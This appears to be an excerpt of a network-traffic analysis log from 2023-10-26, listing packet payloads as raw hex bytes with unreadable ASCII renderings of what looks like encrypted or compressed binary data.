                                      2023-10-26 07:03:21 UTC72INData Raw: 87 92 cc 40 bb 38 72 6d c3 be e4 45 45 0a e5 4c af 5b 1b f8 7e 8c e1 49 6f f8 cd 73 26 68 d9 dc 8b 7e 25 d7 46 36 ce 12 80 6c 05 ba b9 78 90 a3 4f 05 61 a3 79 41 85 2f 57 87 ff 1c 70 84 51 59 4f 31 70 4a d5 9c 28 32 93 48 0f 85 61 60 9f 60 99 91 8b 5d 31 34 58 b0 31 97 20 cd fd b0 ad 1f 23 1d d8 64 d8 5c 7b 61 85 b3 f5 69 3e 97 a2 f5 5e 8c e5 4c e5 e9 c9 94 cc 19 ab 00 47 23 95 40 7c b5 6a 2f 4e ea 8a f7 af 8b 29 8f c5 d2 a5 03 4f 2c a8 3f d6 26 d3 b8 d0 73 13 29 7b bc da 91 43 1d c1 b8 5d 4c 0b 19 33 9a ea 02 40 18 f3 3c 72 85 87 aa 0c fa 6c 14 eb 85 c9 e3 1f a0 a3 ae 1a 29 73 61 f6 39 d8 4f 4d 0c 1a 20 e8 00 8f ce c0 bd 57 98 3a 17 fb dc 52 cf fa 05 a0 3d c1 22 80 12 de 76 d6 f5 d9 4d 91 94 10 41 45 8b 21 4b 80 62 6e c0 c1 26 90 9f 34 d2 a4 b5 79 b8 8d
                                      Data Ascii: @8rmEEL[~Ios&h~%F6lxOayA/WpQYO1pJ(2Ha``]14X1 #d\{ai>^LG#@|j/N)O,?&s){C]L3@<rl)sa9OM W:R="vMAE!Kbn&4y
                                      2023-10-26 07:03:21 UTC73INData Raw: 6e 84 e9 7f 3d 49 01 3c 1a 9f 38 ef 09 28 5d e2 54 bd e9 a9 9f fb 8c d1 2f aa 35 36 89 ec a9 36 97 db a2 e3 49 a6 f1 3b 59 ff 6d 36 8f 67 17 bf b3 44 ff 47 b5 3d 82 5e af a4 3f 0a 43 83 47 cb f9 6e 33 41 46 1f 05 a2 55 4e e6 b4 37 c3 e7 d8 dd 5c 32 cd 44 54 c8 8b 20 00 59 59 54 b3 7f 87 4c c0 4b bb c6 82 78 c9 9e 1a 48 4e 0a 33 5c b6 5b 25 aa 70 80 e1 49 6f ec cd a5 4f 71 d9 4c 4c 75 29 d7 b8 e7 dc 16 7e 60 f7 b6 dd d6 6e ad 48 3c 3e a3 79 41 7b dd 53 89 01 28 a1 87 af 55 bd 3d 12 e4 05 94 22 46 98 60 4f 9e 49 93 b7 21 9f b1 80 a3 3f 3b d5 0e 3c 87 21 cd ff a5 ad 8e 07 07 d8 4e ab 22 7b 61 af 32 fd 69 3e be f3 f8 53 86 50 f4 e9 f3 c3 2b f3 19 ab 0b 00 10 94 40 70 63 e6 23 4e c0 e1 af 87 cc a4 cf cf 2c aa f0 41 49 e4 c1 da 37 2d 96 c1 73 ed 24 4b 9c fa 91
                                      Data Ascii: n=I<8(]T/566I;Ym6gDG=^?CGn3AFUN7\2DT YYTLKxHN3\[%pIoOqLLu)~`nH<>yA{S(U="F`OI!?;<!N"{a2i>SP+@pc#N,AI7-s$K
                                      2023-10-26 07:03:21 UTC75INData Raw: bc 17 83 a7 2b db b5 9a 0f 92 3c bd 54 7f 0e c5 c6 d1 7a 29 84 f7 7f 4c 4a 3d 11 09 f0 6e 63 1c 3c bd c0 8a cb 54 56 ca 67 2d 6e 32 2f 40 20 43 4e 99 eb a8 8b bb 30 a4 bb 64 5e 31 2b b3 ac 65 37 e2 ac 5c 1b 73 8a f1 3d e2 af 1d c5 22 0e 48 8b 4c 7b 48 39 f7 e4 62 09 d6 2b 9c d8 25 cc 90 8b ee 7f c2 47 07 3c 75 2e 38 ef 03 35 57 ea 54 f3 e0 ae 9f c8 8a d1 2f aa 0a 17 89 ec a9 c8 9b b8 a2 c3 4b dc f4 3b 66 09 68 36 8f b1 1c bf b3 47 d7 07 b4 26 b8 a4 a1 43 38 32 4d c8 47 cb 38 42 33 41 44 37 bb ac 75 44 20 6c 39 c3 c7 d8 23 50 12 33 6a 5f c8 f5 6c fe 58 6a b8 bd 74 87 1f b4 4b bb cc 82 7b c3 9e c4 47 45 0a 1b bc b8 7b 23 54 80 80 c1 b7 43 e2 cd 8d 2a 8f d8 7f 04 77 29 d7 ca 83 ee 12 0e 12 14 93 d6 a6 84 8b 53 3d 1e a9 0d 74 7b 23 5c 79 0f 11 78 7a a3 54 43
                                      Data Ascii: +<Tz)LJ=nc<TVg-n2/@ CN0d^1+e7\s="HL{H9b+%G<u.85WT/K;fh6G&C82MG8B3AD7uD l9#P3j_lXjtK{GE{#TC*w)S=t{#\yxzTC
                                      2023-10-26 07:03:21 UTC76INData Raw: fb 70 1c 8a c8 fe 63 e5 3f a9 ad 32 77 85 97 68 ad ee 3a e3 a8 ea b6 d6 3e 31 9a d3 8a 0d d2 52 fe 63 c7 0f 0e 7c 8c 1e d8 2a 65 2c e4 bd 32 8e 94 84 62 ae d8 11 3c 92 dd 92 e3 d5 4b 3a 29 b1 b2 47 79 67 09 c9 fd 95 a7 17 dc b7 d1 e2 24 26 2f 02 28 c7 43 eb 39 d1 e2 87 77 7c 9c 37 72 bd d0 85 b2 2b 25 bb ae 0e aa 99 bf aa 71 da c9 d7 2f 04 c6 a6 d7 0b 23 69 3c ef 02 f3 78 63 1c 3c 7b c9 9b cb 26 97 37 9e a2 fe ef 22 67 2a 50 99 fd eb a8 75 b7 24 a4 8a 69 5e 31 07 eb 52 6b 1c e6 52 50 0f 73 b0 b2 3c e2 af e2 c9 36 0e 68 18 4e 7b 48 b9 0b ea 74 60 eb 1b 9c de 25 32 9c 99 ee 5a ac 35 06 3c 73 1d 34 e1 03 28 5f fc 54 d2 69 ee 9f db 8b f9 f3 aa 0a 1d e6 9d a8 c8 9d 2d ae d5 4b 86 f0 3b 66 ec 35 c8 81 a1 1c 41 bf 48 d7 f9 b9 2b 88 31 81 8d 3f 32 4d bd 54 cb 29
                                      Data Ascii: pc?2wh:>1Rc|*e,2b<K:)Gyg$&/(C9w|7r+%q/#i<xc<{&7"g*Pu$i^1RkRPs<6hN{Ht`%2Z5<s4(_Ti-K;f5AH+1?2MT)
                                      2023-10-26 07:03:21 UTC77INData Raw: e3 33 ec 76 bc 5b aa 03 c0 7b 48 25 27 36 c5 3e 7d ba a9 a5 11 40 97 52 96 46 11 2f 08 14 c4 a3 d1 28 2b ec 60 ab bd 00 fe 87 c0 f7 de bd a0 86 2f a4 a8 ae 54 cd c3 4d ab 0e 82 0a 6c 7d ca de c2 fe cb ac 3d fc 13 75 5c 3d da 65 50 5e ce b5 62 b2 df 3f 66 55 0c b4 1c 36 73 9c 80 d7 d3 fa 70 1e 9f c8 fb 0c 91 3e a9 55 c2 7c 8b af d7 a1 fb 3a 8c 28 ac b6 28 33 1e 46 2d 83 06 bd d9 f3 66 c1 d1 00 69 8c 3e b6 cc 65 2c b6 63 2c 9b 94 7a 46 b4 d9 ef 3a 19 23 0f c6 f5 6b 38 29 8f a1 1f 87 69 f2 c5 0d 99 5e 1b e9 b6 40 c2 5b 7e d1 0c 10 6d 42 18 c1 f1 1d 8b 73 7c 42 38 62 bd 2e d0 99 87 24 4a 45 f0 9e 3a bd 24 18 a9 81 c6 2f 77 fd 8a df 7b b2 46 35 ef 28 c9 6b 63 1c c2 89 c3 8a eb 54 6e 15 9e 46 6f c0 20 67 41 f7 f1 f1 ed a8 ab ba 30 a4 aa 9e 52 39 07 93 ad 65 0a
                                      Data Ascii: 3v[{H%'6>}@RF/(+`/TMl}=u\=eP^b?fU6sp>U|:((3F-fi>e,c,zF:#k8)i^@[~mBs|B8b.$JE:$/w{F5(kcTnFo gA0R9e
                                      2023-10-26 07:03:21 UTC78INData Raw: 3e 79 de 19 3c 78 f2 32 41 89 da 8b bb 6b c2 ee fe 35 32 21 8b d3 ae 85 5c 7f 94 d7 85 ce 75 aa 5d af 07 6d ac b7 c0 6f 0b a8 3f 27 e4 c0 bc 5f 1a 55 36 e2 df 7f 77 b4 13 55 57 6f f5 5f 36 3e 40 9b 8a fa d9 1d 47 f5 6b f5 a3 a3 45 3c 74 f2 dc 6d 95 29 b7 71 ad 37 db f8 e6 27 f4 c8 64 c3 cc e0 73 bc 3b 84 03 c0 7b a2 d7 2d 37 9d 98 8f b6 ac 5b e1 4d 92 46 48 49 13 2f 7a 69 11 ad a4 08 c5 e0 65 ab 6b 18 fc 87 44 60 f0 bb a0 78 26 fc 96 18 83 32 3c b9 87 0c 82 22 6b 27 34 d6 38 f0 eb ac c3 f0 13 8b 7a e0 da 9b 56 72 3b 94 63 b4 21 31 37 75 2d b0 1c 36 2b ef ca de d3 c3 09 10 99 c8 25 00 90 3e da c7 cd 7b 8d 69 98 ab fb c4 7e 2e aa 48 da 37 19 b8 df 83 07 27 55 7e 48 c1 81 70 52 8e 3e a9 45 02 2c bc 49 53 ee 95 7a 68 5e d4 e5 30 79 d1 0b c3 0b 47 33 29 af a0
                                      Data Ascii: >y<x2Ak52!\u]mo?'_U6wUWo_6>@GkE<tm)q7'ds;{-7[MFHI/ziekD`x&2<"k'48zVr;c!17u-6+%>{i~.H7'U~HpR>E,ISzh^0yG3)
                                      2023-10-26 07:03:21 UTC79INData Raw: f7 50 45 97 a6 c6 43 06 b4 62 4e d5 a5 ce 7d 46 93 23 62 05 59 2e 8d 83 53 b5 f9 97 12 8c 70 30 b2 41 87 34 62 64 88 d7 ba 70 4b 28 65 36 ab d4 7b b2 bc 7a 81 9f 72 f6 d0 28 39 50 5a b8 c7 8a 14 aa 8b 62 25 fe 38 39 80 22 7b 4b 63 27 a4 f6 2a f2 1e c4 54 46 9b 09 75 d1 56 73 00 ea b9 34 79 dc 16 3c a6 fa 38 41 a9 83 75 b7 6d ad 00 fe 35 38 df 79 d5 a8 a5 d3 16 bc f3 eb 03 7f 54 5b 52 0b 99 a0 4c cc 4a 1b c7 cd 27 bc 34 4e 54 10 75 c8 ee d9 7f e6 4c 14 55 d3 f8 d1 71 37 c0 44 62 86 04 d5 e4 4b 9c 9e 0b af ae bb 1a 74 f3 22 67 b5 f1 49 78 a6 1f c9 f8 e6 2d 0a 38 6d c2 32 62 1f d3 cb 8f 03 ca 85 52 d2 29 1f 2c c0 71 b2 57 57 16 41 f8 70 68 48 19 d1 74 3a ef 7e ae 08 3b ec 46 d9 ae 16 ff f7 34 07 db be 7d 78 26 a5 a8 3f 71 c6 c3 6d 8b 0c c3 16 6c 26 34 d0 c6
                                      Data Ascii: PECbN}F#bY.Sp0A4bdpK(e6{zr(9PZb%89"{Kc'*TFuVs4y<8Aum58yT[RLJ'4NTuLUq7DbKt"gIx-8m2bR),qWWAphHt:~;F4}x&?qml&4
                                      2023-10-26 07:03:21 UTC81INData Raw: 8c 8f e5 fd ef db fe cb da 01 ee e4 4b 4b b7 bb e5 6f 77 9f 65 80 ac 19 97 9b 64 16 61 9a 66 0e 55 cc 41 7f e4 8c 2e d7 5d 67 c7 59 3e a5 c9 c1 2e 60 9f 90 62 56 d7 78 4a 7b 5c 95 c0 22 aa 33 a7 b2 f5 ee 45 8f a0 7d 0c 42 b9 a2 91 7f 3d 50 9f 51 58 d3 61 81 d3 0e 94 fe 5a 7b cf 4a c4 f7 70 b3 9e a7 c6 f7 cf 4b 9d b0 0b af c8 7d b8 61 2e 67 fb 55 d5 81 78 5f 96 fd 19 7b a4 a6 30 8b 59 79 38 66 44 9f f2 ba 70 b5 d8 6b 33 8b 2f 77 b1 bc 0a e6 ba 7a f6 2e 24 14 74 7b b9 cd 74 18 50 8a 7b 3b fe 38 39 80 27 7d 4b 6b d7 a5 f6 2c 2c 18 c4 54 66 b1 2d 74 d1 a2 0e 10 eb b9 c0 8b d7 1c 1c 58 f6 32 41 77 83 4c bd 6d c2 ce fe 15 33 21 75 df 56 8b d7 16 bc 0d 88 cb 7f 74 59 ac 07 93 5e b3 f9 4a 1b a8 3f 1f b9 3e b0 58 22 52 c8 1d 20 81 85 bc 14 7f d8 16 dd 7b 37 3e 55
                                      Data Ascii: KKowedafUA.]gY>.`bVxJ{\"3E}B=PQXaZ{JpK}a.gUx_{0Yy8fDpk3/wz.$t{tP{;89'}Kk,,Tf-tX2AwLm3!uVtY^J?>X"R {7>U
                                      2023-10-26 07:03:21 UTC82INData Raw: db 7c 2f 7f 89 a8 7d 42 ff 85 47 92 de b8 e3 9c 8b 3b 17 01 18 e7 8f eb 74 36 07 04 1a 59 64 51 f8 29 a4 08 3c f7 c0 11 87 a7 f1 37 39 69 8f 50 4f 9a b9 f2 96 70 6e e7 ed 6a b4 7e 7a 54 0f 30 1b 40 3e 1a d2 48 03 d7 62 3c 31 1b b0 00 3d 8b ca 2b 2b 2d ea b6 2c 49 86 b5 65 0e b6 15 3b 87 89 e5 92 88 d5 fb c1 24 f1 e3 e1 96 78 b2 bb e5 91 85 98 5c b7 a5 19 97 a3 97 e5 98 65 29 2f 55 cc 4b 5d 37 9a 2e d7 a3 95 ce 5c 1e 9e c0 c1 2e 9e 60 a5 7f 56 b8 5f b4 77 56 49 93 58 27 76 a7 4c f8 13 4b b7 a9 5d 0f 42 47 ae 6c 71 57 77 9f af 5e 0a bc a7 d0 0e 94 d8 79 7a f6 58 c4 2a 63 4d 97 a6 38 c2 43 b4 5b 46 2b ab c8 83 b4 9f 20 0d c8 54 2b 87 a1 a1 ba f8 19 51 a4 19 4d b2 4b 7b 38 66 64 86 d6 ba 70 59 d6 69 33 eb 2b 77 b1 af f4 e8 bf 7a f6 d0 28 13 74 5b b8 ec 75 18
                                      Data Ascii: |/}BG;t6YdQ)<79iPOpnj~zT0@>Hb<1=++-,Ie;$x\e)/UK]7.\.`V_wVIX'vLK]BGlqWw^yzX*cM8C[F+ T+QMK{8fdpYi3+wz(t[u
                                      2023-10-26 07:03:21 UTC83INData Raw: 73 56 2d cd 2f 1e 41 d7 8c 47 03 c0 10 5f a0 64 5e d8 60 cc 5b 41 e9 f1 78 7d d7 cf c3 a3 0a 96 90 50 37 db 9c 6a f2 f1 c5 aa 87 18 16 46 c7 1f be 95 51 28 a1 58 2c bd 61 15 9f 8e 36 b8 f0 3c 23 50 00 ee 76 c3 96 7e f4 3b 27 6f 98 47 48 88 09 75 d6 5b 6d ea 86 d5 4c e3 b9 6e 3d 43 5c b4 ae d1 71 88 c7 71 4e f4 8f cb 3c f3 b8 6d ff e7 3a 3f 14 e7 eb 82 84 7e 3a 0f 0e 8b 24 65 51 00 db a8 03 53 26 cd 1b 8d 36 8e 36 39 00 41 5d 44 90 28 31 91 70 0b 6c e2 6e b2 7e 7a 5c 0f a1 91 44 3e 30 0f 4e 03 d7 11 2b ed 1b ba fe 33 70 c6 d3 27 08 eb c5 1e 48 de 41 95 06 b0 eb c9 8d 8f 1b f1 15 d5 94 52 db ff e4 c1 4a 6b b2 bb bc 51 74 60 a3 71 52 15 96 a3 43 c9 99 65 46 08 ab c2 4c 81 ea 77 22 da a3 4b c0 59 1e a7 37 c0 17 8c 9e a9 7a 25 a3 78 b4 7d a2 9b 4f 4b 07 75 a7
                                      Data Ascii: sV-/AG_d^`[Ax}P7jFQ(X,a6<#Pv~;'oGHu[mLn=C\qqN<m:?~:$eQS&669A]D(1pln~z\D>0N+3p'HARJkQt`qRCeFLw"KY7z%x}OKu
                                      2023-10-26 07:03:21 UTC84INData Raw: 4e 92 73 a2 7a 08 c7 c7 98 50 27 37 57 28 6d 3e 86 81 52 6a a9 6c 6c 18 9a aa e0 86 3c 6c e5 e2 c6 73 c2 c1 0d 3e 4a 80 b2 11 25 23 5c 88 98 90 cf a8 17 6f 98 1b e3 b4 12 dc 79 79 61 37 b4 9b ab b7 0b 41 1c c1 0e 32 33 69 fb 39 d3 68 63 50 19 52 0e 3b c9 0f d5 4c fc aa 9d 6b d6 02 69 72 56 59 2c 06 19 31 11 85 40 03 3e 6e 7e 8e 9a 22 b5 fc a2 6c 46 17 f5 1f 41 28 c3 cd cc 9b 9b 96 56 bb e5 b5 6a 7c 92 5f ab e8 23 e9 48 c4 70 e5 a1 51 2e 55 aa 27 b8 13 d0 91 87 46 ff 0e 3d 23 5c 00 ee 73 c3 1a 49 f5 3b 38 c7 e8 46 4e e1 c1 79 d1 51 fc 62 8c d5 b8 32 be 6e 4e 2f 7b 69 a8 2f 7f 83 39 83 40 ff af b8 9e de b8 45 6e 86 39 3f ec 15 e5 89 7a 8c 37 07 61 da 54 64 5b 26 24 a4 08 53 81 ff 3a 71 a6 02 44 03 07 bf 5b b1 9e de 3d 68 7c 6c 19 91 30 84 80 06 25 6f d9 17
                                      Data Ascii: NszP'7W(m>Rjll<ls>J%#\oyya7A23i9hcPR;LkirVY,1@>n~"lFA(Vj|_#HpQ.U'F=#\sI;8FNyQb2nN/{i/9@En9?z7aTd[&$S:qD[=h|l0%o
                                      2023-10-26 07:03:21 UTC86INData Raw: b9 bc c2 41 18 4f 06 e1 a2 f0 47 86 0c 10 f1 9b 73 18 d7 b6 c5 17 86 01 17 e2 da c8 e5 ca d0 11 ed 3c dc 87 18 a5 fb 55 69 ff 02 ff 50 8e 8b c4 9f d9 0a 23 78 20 f8 11 f2 bf d6 f1 ed f2 8c ce 07 5f cd c1 c4 74 27 32 6a 46 9b 56 b7 cc 7a 04 65 b7 88 63 e5 d1 9d f1 44 3e 1f ef fa 14 9c 11 dd 4c a2 7a 02 75 0c 94 50 26 e1 1b 2b 6d a5 8e 9b 53 6a a3 0a 5b 1d 9a aa 1e e8 58 92 9d d7 c6 8d cf ea fd ae 6a 82 4c 1f 20 7c 44 86 98 90 cf 34 7b 95 94 6f e9 4a 1e c4 87 e6 44 3f 4a 97 ae e8 03 5d 1d c1 08 ae 5d 91 f7 c7 df 90 6f 7b 45 c3 2e 21 f3 50 d5 13 dc 55 91 6b d6 12 65 8d 5a 5f d2 f6 12 32 ef 18 67 23 c0 62 7f d1 44 2d b7 fc cd 38 27 e9 f3 70 7d d7 cf c4 a3 65 ba d6 50 45 e9 ed 4a 87 9e 59 ab e4 7e 16 44 ce 1f 68 ac 52 28 3a 86 a0 b8 61 eb cc a7 31 90 7b 3c 40
                                      Data Ascii: AOGs<UiP#x _t'2jFVzecD>LzuP&+mSj[XjL |D4{oJD?J]]o{E.!PUkeZ_2g#bD-8'p}ePEJY~DhR(:a1{<@
                                      2023-10-26 07:03:21 UTC87INData Raw: 31 3f bc a5 94 33 e9 85 4f 75 a0 af 2c bb 3b 3f 24 76 1c bc 5f 29 f9 d5 b3 63 90 18 2e 9c 86 2c 4d 11 c5 6e c0 e3 56 a9 9f 32 ab 19 81 79 be e3 cc 40 49 83 32 b9 31 18 a8 58 c4 cf 4e bf c7 81 d5 ec 79 e5 d5 9a 7d cd 2f 67 04 90 fa e8 77 5c 31 c7 b9 dd 1d 5a f5 4d f4 44 11 41 a5 4e 71 b9 b6 46 32 50 45 06 c8 1b ff 46 8c 16 25 0e 64 8c 3b c9 b1 c5 17 86 00 1a e2 04 da fe ca d0 f4 83 22 ce 87 12 79 06 53 69 ff 02 27 83 8d 8b e4 9a 27 06 23 86 04 df 12 f2 41 da 08 e3 de 8a ce f9 53 3f c0 dd b3 27 32 6a 46 96 6d a5 32 76 07 16 3d 84 63 ef d1 9f f2 44 8f 3d ee fa 14 62 40 f1 4b a2 84 0e 1b f2 b8 50 26 1f 17 d6 6c 0d a4 99 53 6a a3 75 7a 18 9a aa e0 84 34 6c 91 29 ca 7f c3 c9 fe 3f 4a 86 b2 1e 19 26 64 85 98 a8 ca 56 1b 6b a0 8c 14 4b ed 39 8b 7e 64 1d 0b f3 ae
                                      Data Ascii: 1?3Ou,;?$v_)c.,MnV2y@I21XNy}/gw\1ZMDANqF2PEF%d;"ySi''#AS?'2jFm2v=cD=b@KP&lSjuz4l)?J&dVkK9~d
                                      2023-10-26 07:03:21 UTC88INData Raw: 31 a1 78 b2 e3 2f 14 e8 fb 19 ab f4 24 55 94 79 73 4b 66 23 b0 c6 8e f7 c0 ac a4 cf cf 0e 79 ee 41 37 a8 3f d6 39 d3 a1 d9 73 13 29 a5 90 de 91 2c a7 3f b4 4c 90 b9 b8 33 9a e0 dc 4c 19 f3 05 e1 7b 89 a3 f2 08 61 0d 84 82 c8 e3 15 7c 05 5c 14 30 59 9f fb 14 d8 b1 43 14 1f af 93 28 cb 22 3f 42 a9 94 31 17 71 47 42 e0 8b 3e bb 3d c1 28 7c 1c 31 76 4d be d2 5e 6f 98 18 41 b9 87 aa 4b 36 93 6f d3 cb 49 a8 9f 2f e8 70 80 ae b9 8c 4a 1a 49 89 fe 9f 31 18 a8 7e e7 c1 44 bf ff c0 d9 e7 79 cd 6d 97 77 c7 35 1b fb 6f 05 cb 66 65 23 c7 47 d0 65 2e 0b 5b e0 ba 1f 5a ca 49 73 b9 bc 9a 32 53 45 06 e0 a2 f2 4c 86 0c 11 f1 9b 73 18 d8 88 9f 16 78 0d 6e 49 fa cc ef b8 a9 dd ec 75 a1 2b 18 a5 d1 ab 67 fe 02 ff 52 8c 8b de 97 d9 0a 23 78 22 ff 11 0c 4f dd f6 30 b5 8b ce 07
                                      Data Ascii: 1x/$UysKf#yA7?9s),?L3L{a|\0YC("?B1qGB>=(|1vM^oAK6oI/pJI1~Dymw5ofe#Ge.[ZIs2SELsxnIu+gR#x"O0
                                      2023-10-26 07:03:21 UTC89INData Raw: 5b 23 aa 7f b5 f6 b7 63 e0 33 81 28 71 f9 47 75 70 29 8f 46 34 c4 12 5e 75 09 ba d6 28 9e ae 45 3c e0 af 74 41 5b 38 5d 87 01 ee 79 bd bd 55 43 31 3f e5 d5 9c 22 b8 97 42 0f be 55 99 9f 60 61 bf 87 5d 31 ca d9 fd 31 b7 2f 33 f3 aa 53 e0 16 15 d8 44 d8 7c 7b 61 a5 b3 0b 67 32 bf 2d fa 5e 86 78 4c e7 fe c9 fb 05 15 a6 0a 08 42 94 40 7a b5 67 1a 50 ca 8b f7 51 87 a6 cf 3b de a0 fd cf 5e 88 c0 da 3d d3 c1 ed 0e ec d6 a4 bc c9 91 43 80 c1 ba 4b 4c 64 55 3f 97 e0 02 53 18 f3 3c 16 7a b0 87 0c 04 60 f3 e7 a3 c8 1d 13 a4 fb ae 18 32 73 0c 76 60 d8 b1 40 3c c6 ae 81 35 34 3f 39 42 89 80 33 17 89 b9 7b c2 8a 2d 45 31 cc 28 5e 01 d3 76 28 07 d2 74 78 98 18 41 45 8b 29 4b 11 c0 64 c0 5f 70 c4 9f 34 d8 54 9e 79 b8 8c b4 4e 44 89 ef 41 3d 15 a8 5e 0e cf 4e bf 39 7e e1
                                      Data Ascii: [#c3(qGup)F4^u(E<tA[8]yUC1?"BU`a]11/3SD|{ag2-^xLB@zgPQ;^=CKLdU?S<z`2sv`@<54?9B3{-E1(^v(txAE)Kd_p4TyNDA=^N9~
                                      2023-10-26 07:03:21 UTC90INData Raw: 4f e0 ae f0 ae 8b d1 29 54 06 1f 89 12 a5 ce 9b bc d3 c2 4b a0 0f 37 6e ec 93 3a 88 b7 73 cc b2 46 d1 f9 b9 35 88 5e a8 ad 3f 1a 76 82 47 cd 46 0d 32 41 42 c9 49 aa 55 2b 9e ba 3e c9 39 d4 d9 5c 12 32 4a 5e c8 ad 92 0e 5d 53 54 b1 70 87 92 cc 48 bb f9 39 8a 3c 61 39 43 45 0a 1b 64 6b 5b 23 54 7e 72 ed b7 63 ca ed 8e 2a 71 d9 b8 7b 7a 29 d7 46 36 cc 12 5e 60 09 ba d6 28 91 9a 4f 3c 1e a3 79 61 7a 23 5d 87 ff 1e 72 84 af ab 4f 3b 1f c4 d6 9c 22 46 67 49 36 9b 49 99 9f 58 9a b1 8a 5d 09 73 2b 0f ce 69 2d 3a f3 80 ec fd 2f 07 d8 44 d8 5c 39 61 a5 b3 ce 68 3e bf 70 f4 5e 86 7e b2 e9 f3 c8 fb fb 18 b0 3a 2c 50 6d 41 7a 4b 3b 23 4e db ab f7 af 8b a4 31 cb d4 a4 c5 8c 37 a8 c1 da c3 df 9e d0 53 12 29 5b 9c 24 90 7a 92 3f b4 46 3f 10 ab 33 90 1e 2c 40 18 d3 3e e8
                                      Data Ascii: O)TK7n:sF5^?vGF2ABIU+>9\2J^]STpH9<a9CEdk[#T~rc*q{z)F6^`(O<yaz#]rO;"FgI6IX]s+i-:/D\9ah>p^~:,PmAzK;#N17S)[$z?F?3,@>
                                      2023-10-26 07:03:21 UTC92INData Raw: 5c 02 03 84 dd 85 42 4a 3d cf 0a c9 6b 63 e2 32 8a c5 8a 35 58 61 15 be d2 91 cc 23 99 21 50 05 fd eb a8 8b 9b 31 a4 aa 60 a0 3f 08 b3 ac 9b 06 e9 ac 7c 18 73 8a f1 c2 e3 96 19 c5 22 0e 70 1f 4e 7b 48 d9 db 1b 9d 9f 2d 27 9d de 0d 6f 90 8a e4 5f c3 45 07 3c 5d 46 39 ef 05 28 5d e8 54 bd e9 ac 9f fb 8b d1 2f aa 87 57 89 ec a8 36 95 d9 a2 3d 47 ac f1 1b 66 ec 6d 36 af bd 1c bf b3 db 29 0b bf 3d e7 12 a1 ad 35 cc 43 80 47 35 25 61 33 bf 4a 3c 45 82 55 44 18 ba c0 cd cb d8 e5 08 33 33 4a a0 c4 fe 6c fe 55 5f aa 27 8a 89 68 c0 b5 b7 c2 7c 1a ea 9e e4 4f 65 0b 1b 42 b6 66 26 54 7e 8c 3c 96 62 e0 cd 73 26 75 d9 66 77 70 29 d7 90 74 c7 12 74 48 83 ba d6 dc b0 a3 45 3c 1e 39 87 4f 7e 23 a3 8b 05 10 86 88 aa 55 31 0a 1d e4 a5 f3 45 46 99 42 2f 9f 49 99 9f ed df b1
                                      Data Ascii: \BJ=kc25Xa#!P1`?|s"pN{H-'o_E<]F9(]T/W6=Gfm6)=5CG5%a3J<EUD33JlU_'h|OeBf&T~<bs&ufwp)ttHE<9O~#U1EFB/I
                                      2023-10-26 07:03:21 UTC93INData Raw: 05 36 75 24 54 ba d9 3f 88 7f 96 8a 07 bd d9 f3 6d c1 0f 0e 6e 8c c0 d5 25 65 bd 9c 4c 3c 9b 94 1b bf 2c 98 ef 30 86 f5 df c3 f5 41 c4 27 81 a1 b9 75 68 f7 e5 f2 95 59 1b 91 49 4e cd 5b d8 23 0d 17 93 b0 13 c6 7f 8a a7 76 7c 62 39 3b 83 83 76 58 d4 25 b9 b0 0e 6c 30 b3 aa 1e 57 c4 c6 29 88 0f 8e d7 85 45 4a 3d c7 40 c8 6b 65 73 53 84 c5 8c 35 58 6e 15 60 de 9b cc 4c e1 20 69 05 03 e7 b9 8b 9b 31 a4 aa 60 06 cf 09 a2 ac 9b 06 f7 ac a2 11 63 8a 7f 55 dd 67 e1 3a dd d3 4e 1a 4e 7b 6e 3c f5 e4 62 60 2d 27 9c de 0f 8d 8c 8a ee 7f c3 45 07 8f 75 e3 38 95 01 d6 53 c7 57 43 e5 a8 9f db 8a d0 2f aa 0b 0c b9 ef a9 f4 9a d3 a2 a2 4b a6 e0 1b 66 ec 6d 36 71 b9 19 bf 8b d8 d7 07 b5 3d 76 ac a4 ad 1f 31 4d 83 47 35 28 5b 25 41 44 37 bb ae 54 44 77 24 3e c3 cd 26 d3 58
                                      Data Ascii: 6u$T?mn%eL<,0A'uhYIN[#v|b9;vX%l0W)EJ=@kesS5Xn`L i1`cUg:NN{n<b`-'Eu8SWC/Kfm6q=v1MG5([%AD7TDw$>&X
                                      2023-10-26 07:03:21 UTC94INData Raw: b6 ac 5b 3f 51 97 46 68 b6 1d 3b 7a 31 11 af b5 08 1b e6 60 ab 95 ea fe be c4 09 d0 be 98 74 22 a5 a8 e1 76 cd c3 47 75 02 96 0a 6c d8 38 c4 c6 de ee ac 3d fc ed 8a 6b 19 da 9b 5c a4 c2 98 63 92 dd 3f 3f 75 f3 b8 1c 36 59 1a f2 d7 a3 d3 bf 10 99 c2 79 2c 97 3e a9 ab 32 75 9f 97 96 5f f7 2e 72 04 ae b6 d6 3f e7 47 ea ab 07 bd 27 01 6f cc f1 22 68 8c 3e d9 d4 69 2c bc 31 1d ad 94 0a 46 91 d8 ef 3a 25 fd 06 c3 f5 4b c4 27 9b a1 47 87 6b e3 c5 d3 84 59 1b c9 49 41 fb 4a 26 2f 02 e9 61 b9 14 38 ff f3 87 57 6e 62 39 62 43 20 9d a7 2b 25 b9 ae 0e b2 35 bd aa 71 da c4 ff 3d 76 03 84 f7 7b 4c 4a 3d 11 06 c6 6b 43 16 3c 85 c5 74 c5 40 6e 15 60 de 85 cc 03 69 20 69 0f 03 ea 91 9c bb 30 a4 54 6c 5a 31 2f 29 ac 65 00 df 81 5f 1d 73 aa fe 3c e2 af e2 cb 36 0e 48 e4 42
                                      Data Ascii: [?QFh;z1`t"vGul8=k\c??u6Yy,>2u_.r?G'o"h>i,1F:%K'GkYIAJ&/a8Wnb9bC +%5q=v{LJ=kC<t@n`i i0TlZ1/)e_s<6HB
                                      2023-10-26 07:03:21 UTC95INData Raw: 34 32 27 8b d1 a8 85 f2 14 bc f3 84 30 71 58 51 ac f9 9f ac b2 e0 48 1b a8 3f d9 bd 07 a7 58 1a 75 c8 ee dd 7f a1 a4 14 55 d3 3f 01 79 37 3e 6a 6d 86 fa d9 1d 45 ff 6b 0b 51 a8 49 14 5c f5 dc 6b bd 0f b6 48 b1 1f e9 f8 18 21 00 c6 9a cf 39 ec ec 42 15 8d 03 e0 7c 5c db 29 c9 cb cc 71 b8 57 57 13 41 b7 43 68 48 13 d1 7b 08 e1 a3 a1 08 03 48 62 ab 95 34 f9 87 ca 09 2e b0 ac 78 26 5b a4 cd 7d ed c0 47 8b 0c 7c 0b 55 30 34 d0 c6 00 e7 ac 3d 93 b5 8b 52 32 24 95 56 5a ee 91 63 b2 df c1 31 79 0d b4 e2 3a 27 11 e4 d5 d3 fb 8e ee 98 f1 c9 0c 91 3e da df cc 7b 81 69 98 a0 fb 1a 71 24 aa b6 28 31 15 46 d3 